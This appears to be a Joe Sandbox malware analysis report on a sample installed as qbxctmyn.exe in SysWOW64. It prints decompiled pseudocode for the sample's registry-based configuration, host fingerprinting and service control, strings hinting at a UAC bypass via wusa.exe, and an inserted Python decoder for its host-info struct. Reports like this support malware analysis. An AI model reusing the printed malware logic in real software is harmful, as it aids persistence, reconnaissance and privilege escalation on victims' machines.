                                                                                							_t126 = E0040675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0);
                                                                                							_t196 = _t196 + 0xc;
                                                                                							_v8 = _t126;
                                                                                							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                							if(__eflags == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _t126;
                                                                                							if(_t126 == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _v20 -  *0x4121a4; // 0x0
                                                                                							if(__eflags != 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							_t128 = E004024C2(_v8, _t127, 0);
                                                                                							_t196 = _t196 + 0xc;
                                                                                							__eflags =  *0x4122d4 - _t128; // 0x0
                                                                                							if(__eflags == 0) {
                                                                                								goto L53;
                                                                                							}
                                                                                							goto L42;
                                                                                						}
                                                                                						_t189 = 4;
                                                                                						_v8 = 0;
                                                                                						_v16 = _t189;
                                                                                						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
                                                                                						_t199 = _t199 + 0x14;
                                                                                						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
                                                                                						__eflags = _t160;
                                                                                						if(_t160 != 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
                                                                                						__eflags = _t165;
                                                                                						if(_t165 != 0) {
                                                                                							L16:
                                                                                							_v8 = 0;
                                                                                							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
                                                                                							L17:
                                                                                							RegCloseKey(_v12);
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v28 - _t189;
                                                                                						if(_v28 != _t189) {
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _v16 - _t189;
                                                                                						if(_v16 != _t189) {
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _v8;
                                                                                						if(_v8 == 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00408328
                                                                                0x00408328
                                                                                0x00408334
                                                                                0x0040833e
                                                                                0x00000000
                                                                                0x00408342
                                                                                0x0040834a
                                                                                0x00408354
                                                                                0x00408356
                                                                                0x0040846b
                                                                                0x0040846e
                                                                                0x00408474
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040847a
[Graph residue: node address labels for this function (0x0040835c .. 0x0040877a), rendered as an image in the original report, omitted]

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$localcfg
                                                                                • API String ID: 237177642-1194859034
                                                                                • Opcode ID: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                • Opcode Fuzzy Hash: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
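Added example, not Joe Sandbox output and not code from the sample: a decoder for the 0x64-byte host-info block that the decompiled E00401D96 below fills from the localcfg registry values (lid_file_upd, flags_upd, net_type, born_date) and from GetVersionExA/GetSystemInfo/IsWow64Process. Every offset and bit below is taken from that decompile; little-endian DWORDs are assumed (32-bit PE). Bytes at offsets the page does not show are left uninterpreted, and the field names are mine, not the malware's. The scan helper and the sample block are constructed test data, not a real dump.

```python
import struct

STRUCT_SIZE = 0x64          # E0040EE2A(..., 0, 0x64) zero-fills the block; offset 0 then holds 0x64

OFF_FLAGS        = 0x04     # DWORD, OR-ed with registry DWORD localcfg\flags_upd
OFF_NET_TYPE     = 0x14     # DWORD, registry DWORD localcfg\net_type plus a 0x10 or 0x20 marker bit
OFF_LID_FILE_UPD = 0x24     # DWORD, registry DWORD localcfg\lid_file_upd
OFF_BORN_DATE    = 0x30     # DWORD, zeroed here; localcfg\born_date is written back if it reads as 0
OFF_NUM_CPUS     = 0x3f     # BYTE, SYSTEM_INFO.dwNumberOfProcessors truncated to one byte
OFF_CONST2       = 0x40     # BYTE, always written as 2
OFF_OS_VERSION   = 0x41     # BYTE, (dwMajorVersion << 4) + dwMinorVersion, 0 if GetVersionExA failed

FLAG_STOP_SERVICES = 0x08   # flags_upd bit: cleared, "work_srv"/"start_srv" passed to E0040DF70, flags_upd reset to 0
NET_MARK_A = 0x10           # set when E0040199C(net_type) returned 0
NET_MARK_B = 0x20           # set otherwise


def encode_os_version(major, minor):
    """Same byte the sample stores: high nibble major, low nibble minor (wraps past 15)."""
    return ((major << 4) + minor) & 0xFF


def decode_os_version(byte):
    """Inverse of encode_os_version. Caveat: a process without a compatibility manifest is
    told 6.2 by GetVersionExA on Windows 8.1 and later, so 0x62 does not prove Windows 8."""
    return byte >> 4, byte & 0x0F


def parse_localcfg_struct(blob):
    """Decode the known fields of one 0x64-byte block; unknown offsets are not returned."""
    if len(blob) < STRUCT_SIZE:
        raise ValueError("need at least 0x64 bytes, got %d" % len(blob))
    dword = lambda off: struct.unpack_from("<I", blob, off)[0]
    flags = dword(OFF_FLAGS)
    net_type = dword(OFF_NET_TYPE)
    major, minor = decode_os_version(blob[OFF_OS_VERSION])
    return {
        "size": dword(0),
        "flags": flags,
        "flags_stop_services": bool(flags & FLAG_STOP_SERVICES),
        "net_type": net_type,
        "net_type_base": net_type & ~(NET_MARK_A | NET_MARK_B) & 0xFFFFFFFF,
        "net_mark": "A" if net_type & NET_MARK_A else ("B" if net_type & NET_MARK_B else None),
        "lid_file_upd": dword(OFF_LID_FILE_UPD),
        "born_date": dword(OFF_BORN_DATE),
        "num_cpus": blob[OFF_NUM_CPUS],
        "const2": blob[OFF_CONST2],
        "os_major": major,
        "os_minor": minor,
        # cheap sanity check: the two constants the function always writes
        "looks_valid": dword(0) == STRUCT_SIZE and blob[OFF_CONST2] == 2,
    }


def build_sample_struct(flags=0, net_type=0, lid_file_upd=0, born_date=0,
                        num_cpus=1, os_major=6, os_minor=1):
    """Constructed test input laid out as E00401D96 leaves the block (not a captured dump)."""
    buf = bytearray(STRUCT_SIZE)
    struct.pack_into("<I", buf, 0, STRUCT_SIZE)
    struct.pack_into("<I", buf, OFF_FLAGS, flags)
    struct.pack_into("<I", buf, OFF_NET_TYPE, net_type)
    struct.pack_into("<I", buf, OFF_LID_FILE_UPD, lid_file_upd)
    struct.pack_into("<I", buf, OFF_BORN_DATE, born_date)
    buf[OFF_NUM_CPUS] = num_cpus & 0xFF
    buf[OFF_CONST2] = 2
    buf[OFF_OS_VERSION] = encode_os_version(os_major, os_minor)
    return bytes(buf)


def find_localcfg_structs(dump):
    """Scan a memory image for candidate blocks: DWORD 0x64 at +0 and byte 2 at +0x40.
    Expect false positives on a large image; confirm each hit with parse_localcfg_struct."""
    hits = []
    start = 0
    while True:
        i = dump.find(b"\x64\x00\x00\x00", start)
        if i < 0 or i + STRUCT_SIZE > len(dump):
            break
        if dump[i + OFF_CONST2] == 2:
            hits.append(i)
        start = i + 1
    return hits


if __name__ == "__main__":
    # constructed image: 37 bytes of padding, then one block as a Windows 10 x86 host would produce it
    image = b"\x00" * 37 + build_sample_struct(flags=0x08, net_type=0x13, lid_file_upd=0x1234,
                                                born_date=0x63C0A000, num_cpus=4,
                                                os_major=10, os_minor=0)
    for off in find_localcfg_structs(image):
        print(hex(off), parse_localcfg_struct(image[off:]))
```

The decoder is meant for the process dump the report was generated from (the 0x400000 region of the injected qbxctmyn.exe instance): locate candidates with find_localcfg_structs, then read flags_stop_services and the net_type marker to see which branch the sample took on that host.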

                                                                                C-Code - Quality: 95%
                                                                                			E00401D96(void* __ecx, intOrPtr* _a4) {
                                                                                				struct _OSVERSIONINFOA _v156;
                                                                                				struct _SYSTEM_INFO _v192;
                                                                                				char _v196;
                                                                                				intOrPtr _v200;
                                                                                				intOrPtr _t59;
                                                                                				signed int _t61;
                                                                                				signed int _t63;
                                                                                				void* _t65;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr _t67;
                                                                                				signed int _t71;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr* _t103;
                                                                                				intOrPtr* _t105;
                                                                                				void* _t109;
                                                                                				void* _t110;
                                                                                				void* _t111;
                                                                                				void* _t112;
                                                                                				void* _t113;
                                                                                				void* _t114;
                                                                                
                                                                                				_t105 = _a4;
                                                                                				_t102 = 0x64;
                                                                                				E0040EE2A(__ecx, _t105, 0, _t102);
                                                                                				_t109 =  &_v200 + 0xc;
                                                                                				 *_t105 = _t102;
                                                                                				_v156.dwOSVersionInfoSize = 0x9c;
                                                                                				if(GetVersionExA( &_v156) == 0) {
                                                                                					 *((char*)(_t105 + 0x41)) = 0;
                                                                                				} else {
                                                                                					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
                                                                                				}
                                                                                				GetSystemInfo( &_v192);
                                                                                				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
                                                                                				_v196 = 0;
                                                                                				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                				if(_t103 != 0) {
                                                                                					 *_t103(GetCurrentProcess(),  &_v196);
                                                                                				}
                                                                                				_t104 = "localcfg";
                                                                                				 *((char*)(_t105 + 0x40)) = 2;
                                                                                				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
                                                                                				_t92 = "flags_upd";
                                                                                				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
                                                                                				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
                                                                                				_t61 =  *(_t105 + 4);
                                                                                				_t110 = _t109 + 0x20;
                                                                                				if((_t61 & 0x00000008) != 0) {
                                                                                					 *(_t105 + 4) = _t61 & 0xfffffff7;
                                                                                					E0040DF70(1, "work_srv");
                                                                                					E0040DF70(1, "start_srv");
                                                                                					_t110 = _t110 + 0x10;
                                                                                				}
                                                                                				E0040EA84(1, _t104, _t92, 0);
                                                                                				_t93 = 0;
                                                                                				_t63 = E0040E819(1, _t104, "net_type", 0);
                                                                                				_t111 = _t110 + 0x20;
                                                                                				 *(_t105 + 0x14) = _t63;
                                                                                				if(E0040199C(_t63) == 0) {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
                                                                                				} else {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
                                                                                				}
                                                                                				_t65 = E0040E819(1, _t104, "born_date", _t93);
                                                                                				_t112 = _t111 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
                                                                                				if(_t65 == _t93) {
                                                                                					_t97 = E0040F04E(_t93);
                                                                                					E0040EA84(1, _t104, "born_date", _t97);
                                                                                					_t112 = _t112 + 0x14;
                                                                                					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
                                                                                					_t93 = 0;
                                                                                				}
                                                                                				_t94 = "id";
                                                                                				_t66 = E0040E819(1, _t104, "id", _t93);
                                                                                				_t113 = _t112 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
                                                                                				if(_t66 == 0) {
                                                                                					_v200 = E00401B71();
                                                                                					E0040EA84(1, _t104, _t94, _t77);
                                                                                					_t113 = _t113 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
                                                                                				}
                                                                                				_t95 = "hi_id";
                                                                                				_t67 = E0040E819(1, _t104, "hi_id", 0);
                                                                                				_t114 = _t113 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
                                                                                				if(_t67 == 0) {
                                                                                					_v200 = E00401BDF();
                                                                                					E0040EA84(1, _t104, _t95, _t74);
                                                                                					_t114 = _t114 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 8)) = 0x61;
                                                                                				_t96 = E0040E819(1, _t104, "loader_id", 0);
                                                                                				if(_t96 == 0) {
                                                                                					_t96 = 4;
                                                                                					E0040EA84(1, _t104, "loader_id", _t96);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
                                                                                				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
                                                                                				if( *0x41201d == 0) {
                                                                                					if( *0x41201f == 0) {
                                                                                						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
                                                                                					} else {
                                                                                						if(E00406EC3() != 0) {
                                                                                							 *(_t105 + 0x18) = 2;
                                                                                						} else {
                                                                                							 *(_t105 + 0x18) = 0x10;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					 *(_t105 + 0x18) = 1;
                                                                                				}
                                                                                				if(_v196 != 0) {
                                                                                					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
                                                                                				}
                                                                                				_t71 = GetTickCount() / 0x3e8;
                                                                                				 *0x412110 = _t71;
                                                                                				 *(_t105 + 0x28) = _t71;
                                                                                				return _t71;
                                                                                			}

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E0040199C(void* __eax) {
                                                                                				long _v8;
                                                                                				_Unknown_base(*)()* _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				long _v28;
                                                                                				_Unknown_base(*)()* _t30;
                                                                                				intOrPtr _t32;
                                                                                				void* _t34;
                                                                                				void* _t41;
                                                                                				struct HINSTANCE__* _t48;
                                                                                				_Unknown_base(*)()* _t49;
                                                                                				void* _t50;
                                                                                
                                                                                				_v20 = 0;
                                                                                				_v28 = 0;
                                                                                				__imp__#11("123.45.67.89");
                                                                                				_v24 = __eax;
                                                                                				_t48 = LoadLibraryA("Iphlpapi.dll");
                                                                                				_v16 = _t48;
                                                                                				if(_t48 != 0) {
                                                                                					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
                                                                                					_t49 = GetProcAddress(_t48, "GetIfEntry");
                                                                                					_t30 = GetProcAddress(_v16, "GetBestInterface");
                                                                                					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
                                                                                						FreeLibrary(_v16);
                                                                                						goto L21;
                                                                                					} else {
                                                                                						 *_t30(_v24,  &_v20);
                                                                                						_t34 = GetProcessHeap();
                                                                                						_v24 = _t34;
                                                                                						if(_t34 == 0) {
                                                                                							L21:
                                                                                							_t32 = 0;
                                                                                							L22:
                                                                                							return _t32;
                                                                                						}
                                                                                						_t50 = HeapAlloc(_t34, 0, 0x288);
                                                                                						if(_t50 == 0) {
                                                                                							goto L21;
                                                                                						}
                                                                                						_push( &_v8);
                                                                                						_push(_t50);
                                                                                						_v8 = 0x288;
                                                                                						if(_v12() == 0x6f) {
                                                                                							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
                                                                                						}
                                                                                						if(_t50 == 0) {
                                                                                							L18:
                                                                                							FreeLibrary(_v16);
                                                                                							if(_v28 == 0) {
                                                                                								goto L21;
                                                                                							}
                                                                                							_t32 = 1;
                                                                                							goto L22;
                                                                                						} else {
                                                                                							_push( &_v8);
                                                                                							_push(_t50);
                                                                                							if(_v12() != 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							_t41 = _t50;
                                                                                							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                                                                                								_t41 =  *_t41;
                                                                                								if(_t41 != 0) {
                                                                                									continue;
                                                                                								}
                                                                                								L17:
                                                                                								HeapFree(_v24, 0, _t50);
                                                                                								goto L18;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                							goto L17;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}
                                                                                0x004019fe
                                                                                0x00000000

                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 835516345-270533642
                                                                                • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 00E3865A
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 00E3867B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 00E386A8
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00E386B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: "$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 237177642-589287442
                                                                                • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction ID: e7d7aaf9702b4af3cf8b9d1985e3bbfae2bd3a04f3cd8e7a0cf09a594e871417
                                                                                • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction Fuzzy Hash: 30C192B1900248BEEB119BA4DE8AEEF7FBDEB04304F145076F604F6151EA714A94CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00402A62(void* __ecx, intOrPtr* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr* _v44;
                                                                                				signed short _v272;
                                                                                				char _v276;
                                                                                				long _v280;
                                                                                				char _v284;
                                                                                				signed short _v288;
                                                                                				signed short _v292;
                                                                                				long _v300;
                                                                                				long _v304;
                                                                                				intOrPtr _v308;
                                                                                				signed short _v324;
                                                                                				intOrPtr _v332;
                                                                                				signed short _v336;
                                                                                				signed int _v340;
                                                                                				signed int _v344;
                                                                                				void* _v348;
                                                                                				signed short _v352;
                                                                                				signed short _v356;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t53;
                                                                                				signed short _t66;
                                                                                				void** _t71;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				signed short _t79;
                                                                                				intOrPtr* _t81;
                                                                                				signed short _t82;
                                                                                				signed short _t83;
                                                                                				intOrPtr _t86;
                                                                                				signed int _t88;
                                                                                				void* _t90;
                                                                                				long _t91;
                                                                                				signed short _t92;
                                                                                				void* _t94;
                                                                                
                                                                                				_t77 = __ecx;
                                                                                				_t91 = 0;
                                                                                				 *_a12 = 1;
                                                                                				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
                                                                                				_t76 = _t50;
                                                                                				if(_t76 != 0) {
                                                                                					__imp__#23(2, 2, 0x11, _t78);
                                                                                					_t79 = _t50;
                                                                                					_v288 = _t79;
                                                                                					if(_t79 == 0 || _t79 == 0xffffffff) {
                                                                                						HeapFree(GetProcessHeap(), _t91, _t76);
                                                                                						_t53 = 0;
                                                                                						goto L37;
                                                                                					} else {
                                                                                						_v304 = 0;
                                                                                						while(1) {
                                                                                							_v300 = _t91;
                                                                                							if(_v304 != _t91) {
                                                                                								_push(_t91);
                                                                                							} else {
                                                                                								_push(0x100);
                                                                                							}
                                                                                							__imp__#9();
                                                                                							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							if(_t50 != 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t86 = 0xc;
                                                                                							_t50 =  &_v276;
                                                                                							_v272 = _t79;
                                                                                							_v276 = 1;
                                                                                							_v284 = _t86;
                                                                                							_v280 = _t91;
                                                                                							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
                                                                                							if(_t50 <= 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							__imp__#16(_t79, _t76, 0x1000, _t91);
                                                                                							_t92 = _t50;
                                                                                							_v324 = _t92;
                                                                                							if(_t92 > 0 && _t92 > _t86) {
                                                                                								_t81 = __imp__#15;
                                                                                								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
                                                                                								if(_t88 == 3) {
                                                                                									L34:
                                                                                									 *_v44 = 2;
                                                                                									L35:
                                                                                									HeapFree(GetProcessHeap(), 0, _t76);
                                                                                									__imp__#3(_v292);
                                                                                									_t53 = _v308;
                                                                                									L37:
                                                                                									return _t53;
                                                                                								}
                                                                                								if(_t88 != 2) {
                                                                                									L16:
                                                                                									if(_t88 != 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_t50 = E00402923(_t77, _t76, _t92);
                                                                                									_pop(_t77);
                                                                                									_v336 = _t50;
                                                                                									if(_t50 == 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_v340 = _v340 & 0x00000000;
                                                                                									_v344 = _v344 & 0x00000000;
                                                                                									_t82 = _t50;
                                                                                									_v352 = _t82;
                                                                                									L20:
                                                                                									while(1) {
                                                                                										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
                                                                                											L30:
                                                                                											_t83 =  *_t82;
                                                                                											_v352 = _t83;
                                                                                											if(_t83 != 0) {
                                                                                												_t82 = _v352;
                                                                                												continue;
                                                                                											}
                                                                                											goto L31;
                                                                                										} else {
                                                                                											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
                                                                                											if(_t90 == 0) {
                                                                                												L31:
                                                                                												_t50 = E00402904(_v336);
                                                                                												if(_v344 != 0) {
                                                                                													goto L35;
                                                                                												}
                                                                                												goto L32;
                                                                                											}
                                                                                											E0040EE2A(_t77, _t90, 0, 0x108);
                                                                                											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
                                                                                											_t94 = _t94 + 0xc;
                                                                                											__imp__#15();
                                                                                											 *(_t90 + 4) = _t66 & 0x0000ffff;
                                                                                											_t33 = _t90 + 8; // 0x8
                                                                                											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
                                                                                											_t77 = _t66;
                                                                                											if( *((char*)(_t90 + 8)) != 0) {
                                                                                												_t71 = _v344;
                                                                                												_v344 = _t90;
                                                                                												if(_t71 != 0) {
                                                                                													 *_t71 = _t90;
                                                                                												} else {
                                                                                													_v348 = _t90;
                                                                                												}
                                                                                											} else {
                                                                                												HeapFree(GetProcessHeap(), 0, _t90);
                                                                                											}
                                                                                											_t82 = _v356;
                                                                                											goto L30;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								_push( *(_t76 + 2) & 0x0000ffff);
                                                                                								if( *_t81() < 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L16;
                                                                                							}
                                                                                							L32:
                                                                                							_v308 = _v308 + 1;
                                                                                							if(_v308 < 2) {
                                                                                								_t79 = _v292;
                                                                                								_t91 = 0;
                                                                                								continue;
                                                                                							}
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}
                                                                                0x00402c79
                                                                                0x00402c7f
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bf3
                                                                                0x00402c08
                                                                                0x00402c0c
                                                                                0x00402c85
                                                                                0x00402c89
                                                                                0x00402c93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c93
                                                                                0x00402c12
                                                                                0x00402c1d
                                                                                0x00402c21
                                                                                0x00402c25
                                                                                0x00402c32
                                                                                0x00402c3e
                                                                                0x00402c41
                                                                                0x00402c4a
